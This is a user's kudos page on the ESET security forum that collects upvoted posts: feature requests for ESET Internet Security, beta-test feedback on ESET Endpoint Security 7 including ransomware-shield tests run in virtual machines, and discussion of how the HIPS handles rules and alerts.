Jump to content

persian-boy

Members
  • Posts

    242
  • Joined

  • Days Won

    3

Kudos

  1. Upvote
    persian-boy gave kudos to nexon in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Please add virtual keyboard for entering password on screen with mouse on vritual keyboard.
  2. Upvote
    persian-boy gave kudos to jems in Future changes to ESET Internet Security and ESET Smart Security Premium   
    separate scans for  - a vulnerability scan AND a root-kit scan - ala - KTS
  3. Upvote
    persian-boy gave kudos to itman in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Add option to realtime scanner to block obfuscated Powershell scripts. Option would be dependent upon Win 10 AMSI option enabled in the Eset GUI.
    Justification
    Microsoft added a like mitigation in the form of a Windows Defender Exploit Guard ASR mitigation effective with Win 10 1709. ASR mitigations are only effective if Windows Defender is enabled as the realtime scan engine.
    Further justification is Eset's failure to detect malware in highly obfuscated PowerShell script in a Malware Research Group ad hoc test: https://www.mrg-effitas.com/research/current-state-of-malicious-powershell-script-blocking/
  4. Upvote
    persian-boy gave kudos to itman in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Add a column showing PID number in the following logs after the noted existing log column headings:
    1. HIPS - Application
    2. Network - Source
    This is necessary to properly identify the origin for multiple same process occurrences such as svchost.exe. 
  5. Upvote
    persian-boy gave kudos to Samet Chan in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Add - Dark Mode on ESET Nod32 would be great.
  6. Upvote
    persian-boy gave kudos to 0xDEADBEEF in ESET Endpoint Security 7 is available for evaluation   
    Yes I was running that exact file in VMWare with Windows 8 Pro. My files got encrypted immediately and the payload deleted itself after encryption is done.
    I've also tried to run exactly the same sample in a VMWare Windows 7 Pro image, and it also encrypted the file.
    I have sent you private msg with the sample I used
  7. Upvote
    persian-boy gave kudos to 0xDEADBEEF in ESET Endpoint Security 7 is available for evaluation   
    Unfortunately v7 with latest definition and all protection layers on fails to block this ransomware sample :
    SHA256: 683ea0257ab6310dc5a6a65acc63737259eb044f0a000ba58d63e8e75533ae72
    All files are encrypted despite ESET detected some ransom note files as Filecoder.FV
    From the livegrid information, it is already with some number of users
  8. Upvote
    persian-boy gave kudos to J.D. in ESET Endpoint Security 7 is available for evaluation   
    Unfortunately disabling realtime protection cause ransomware shield less effective because it does not receive then all the events from the file system.
  9. Upvote
    persian-boy gave kudos to 0xDEADBEEF in ESET Endpoint Security 7 is available for evaluation   
    Feedback so far:
    1. Seamless upgrade from versions 6.5, 6.6: tried to upgrade from EES 6.6 to 7.0, the upgrade process was smooth, and all settings were retained. Threat logs and the software version are correctly reported to ERA. The system is Windows 10 16299
    2. Anti-ransomware protection: The testing system is WIndows 8.1 Pro in a virtual machine. First tried Cerber, and ransomware protection is effective (Beh.C1). Cerber is fairly old now, so I also tried 5~6 other recent ransomware samples which will encrypt files even in a virtual machine. Unfortunately, none of them were caught by the ransomware shield and files were encrypted. My testing methodology was to disable realtime protection and AMS and run the malware. The virtual system's key folders were pre-populated with documents and images. Of course one can argue that these sample can be detected by early layers like scanning...
    5&6. Process exclusions and hash exclusion: I tried a GandCrab sample, first adding its SHA1 to the exclusion list, and the realtime scan indeed skipped the detection. With AMS enabled this threat can still be detected post-execution. So I further added the executable to the process exclusion list, and AMS still detected it. Not sure if this is expected or not. UPDATE: I think GandCrab is a bit special, other samples will be successfully excluded
    Other issues: seems that in the settings, sometimes even if I don't change any options, there will be a confirmation popup asking if I want to discard current changes upon closing the setting window. This doesn't happen in all cases. On my side, the way to stably reproduce it is to navigate to "email client protection" page, and then to "web access protection" page, and then try to close the setting window.
    p.s. glad to see the maximize window button returns to the GUI, this makes touch screen operations less awkward
  10. Upvote
    persian-boy gave kudos to rekun in ESET Endpoint Security 7 is available for evaluation   
    Hi
    1. seems to be ok
    Are there any detailed changelogs?
    I cant seem to find anything related to Dynamic Threat Defense. Is it not included here?
  11. Upvote
    persian-boy gave kudos to Peter Randziak in ESET Endpoint Security 7 is available for evaluation   
    Hello and welcome to the ESET Endpoint 7 BETA testing.
    Below you can find the promised list of main new features we would like to hear your experience with (you can post replies such as “1. O.K., 2. O.K., 3. failed with error XY,…”)
    1.       Seamless upgrade from versions 6.5, 6.6 and even from version 5 by means of ERA or direct manual upgrade
    2.       Anti-ransomware protection – please install it on the most trouble-causing PC in your company or on a system with high risk of infection, like in DMZ or with sensitive data
    3.       Auto-update – please check if the Endpoints are being seamlessly upgraded to a new version once we release it 
    4.       Time-based Web control and Device control rules – set them up as needed with assigned time intervals and let us know whether they work as expected and configured
    5.       Process exclusions – set them up (ideally for your backup software / agent) and observe if potential issues with it get resolved and if the backups are faster than before
    6. Try new type of exclusion by hash (SHA1) – exclude a file located in a user’s profile or on a mounted disk by its SHA1, the scanner should skip it.
    The new ESET Endpoint Security / ESET Endpoint Antivirus 7 BETA can be managed by ESET Remote Administrator 6.5 – however, the new features need to be configured locally for now, as the new ERA required to control them is, unfortunately, not yet prepared for a public BETA release.
    You can download the ESET Endpoint Security / ESET Endpoint Antivirus installation packages from http://ftp.nod.sk/~randziak/EP7_BETA/7.0.2065.0/
    The encryption passwords are 
    eea_nt32 "811a2cdea4fe138ec52a99e6e8df29233093581d"
    eea_nt64 "8777e163df9f633ed84832390d9e5faf0c5a8ed1"
    ees_nt32 "9b126754a071507aa5136dcb7f076a25d2a0262a"
    ees_nt64 "d9a1d0439889a77f78ad48c811df36bd3a247399"
    Those are SHA1 for the respective .msi packages, in case you would like to check them.

    In case you would like to report any additional issue, please use a separate topic in this forum for each one of them for easier navigation.
    Please do not share details about this program outside this sub-forum until the product is globally released.

    We are looking forward to your feedback and experience with the 7th generation of ESET Endpoint products.
    Thank you in advance, 
    Peter Randziak
     
  12. Upvote
    persian-boy gave kudos to Peter Randziak in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Hello guys,
    Ransomware Shield is a behavioral protection feature utilizing data from the ESET LiveGrid reputation system. 
    Regards, P.R.
  13. Upvote
    persian-boy gave kudos to Wolf Igmc4 in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Add a behavior blocker, based on the reputation system of Eset. Yes, I said this some time ago, but if Eset don't add it, in the future, this will be a big problem. 
  14. Upvote
    persian-boy gave kudos to itman in Future changes to ESET Internet Security and ESET Smart Security Premium   
    It actually used to do this prior to ver. 11. I believe this has something to do with Microsoft's decree to AV vendors that they can't interfere with the boot process in Win 10 ver. 1709. I am actually surprised that Eset even processes an Ask HIPS use in ver. 11 and instead, just auto allows it. I know it is doing so because it will slightly delay your boot time; something I though wasn't supposed to happen on Win 10 ver. 1709.
    Again it is a bit peculiar that the HIPS default action is allow. However, it always has been this way. To be honest, I seriously doubt Eset will change it to block mode.
    A proper frame of reference for you is Eset first and foremost created the HIPS for its own internal use. As such, it really isn't designed to be user configurable other than to create a few exception rules. This is more so evident in the retail vers. of Eset. For example, Eset added file wildcard capability a while back for the Endpoint vers. but refuses to do so for the retail vers..
  15. Upvote
    persian-boy gave kudos to itman in Future changes to ESET Internet Security and ESET Smart Security Premium   
    I explained this once to you. Eset has internal default rules and those rules take precedence to any user created rules.
    Also if an alert response is not received within a short period of time, Eset will auto allow the action. This comes into play for example with any ask rule that might be triggered during the boot process. Those will be allowed by the time the PC initializes, the desktop appears, and finally the Eset GUI is started. 
  16. Upvote
    persian-boy gave kudos to itman in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Nvidia in their "infinite security wisdom" created two .bat scripts they dumped in C:\Windows directory. Their startup service can run these .bat scripts if errors are encountered in their software as recovery procedures. So basically, you have to allow svchost.exe to run cmd.exe. Not the most secure thing to do if malware creates a malicious service. Hence my recommendation that file wildcard support is needed.
    There is also the issue of why the HIPS hasn't been updated to reflect Win 10's current ability to uniquely identify an individual svchost.exe service by process id. 
  17. Upvote
    persian-boy gave kudos to eternalromance in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Description: Add option to enforce firewall rules created on the spot until the PC is rebooted
    Detail: Please add an option to enforce firewall rules created on the spot until the PC is rebooted or powered off
     
     

  18. Upvote
    persian-boy gave kudos to Wolf Igmc4 in Future changes to ESET Internet Security and ESET Smart Security Premium   
    That's a good suggestion.
  19. Upvote
    persian-boy received kudos from Wolf Igmc4 in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Suggestion: Reputation scan
    A costume scan that scans the whole hard drive with live grid and gets reputations for everything(Dll, Exe,...) on the machine.
  20. Upvote
    persian-boy received kudos from Aryeh Goretsky in Future changes to ESET Internet Security and ESET Smart Security Premium   
    suggestion: Separate export and import settings or Hips
  21. Upvote
    persian-boy gave kudos to peteyt in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Description: More information in system cleaner
    Detail: I have mentioned this previously. System cleaner is the new tool in version 11 that alerts you to system settings that have been changed from default the idea being that they could have been changed by malware.
    The issue is they give no information on the actual setting just the type of setting. I tested this feature by clicking to change settings hoping I would be shown the changes and able to make a decision.
    What would make more sense is having a way to see the actual changes and a way to ignore certain changes that the user wants to keep. Many people change things themselves e.g Windows tweakers and this feature could cause issues if they change things without realising. This could always be a more advanced option disabled by default.
    If this cannot happen at least have a lot for this feature so that advanced users can see the changes made. If eset is changing a Windows option it shouldn't be too hard to log the change somewhere. Also an undo feature might be handy as when I tried it out hoping i would be given options eset just changed them and with no lot I have no idea what got changed 
  22. Upvote
    persian-boy gave kudos to itman in Future changes to ESET Internet Security and ESET Smart Security Premium   
    Yeah, I know about this.
    Just be careful with GitHub software. Being open source, it can be hacked. One of the major sources of nasty backdoors has been GitHub software.
  23. Upvote
    persian-boy gave kudos to itman in Future changes to ESET Internet Security and ESET Smart Security Premium   
    As far as anti-exec processing, there is a one built into Win 10 - native SmartScreen. I have tested with a couple of unknown reputation files and each time got an alert from it when they tried to run. Eset let the files run w/o issue. Neither file was malicious but I prefer an option to disallow execution in this instance.
    The downside is native SmartScreen relies on "The Mark of the Web" remaining associated with the downloaded file. There are ways to "strip that off" of a download.
  24. Upvote
    persian-boy gave kudos to itman in Future changes to ESET Internet Security and ESET Smart Security Premium   
    I did some of my own testing in regards to this business about the HIPS not detecting Farber activity. For starters, I set the HIPS to Interactive mode and then ran Farbar.
    To begin with, Farbar will load and begin execution because you started it manually. However, the first attempt by Farbar to perform any activity the HIPS monitors for will cause an alert as shown by the below screen shot.
    Now if you create a .bat script and run Farbar by execution of the script, you will receive a HIPS alert about the startup of Farbar. Likewise, malware doesn't magically run by itself. Something has to execute it. 

  25. Upvote
    persian-boy gave kudos to itman in Future changes to ESET Internet Security and ESET Smart Security Premium   
    I have run Farbar in the past and Eset HIPS in Auto or Safe mode will not alert because its a safe app.
    Are you saying that the HIPS in Interactive or Policy mode is not throwing an alert at Farber startup time?
×
×
  • Create New...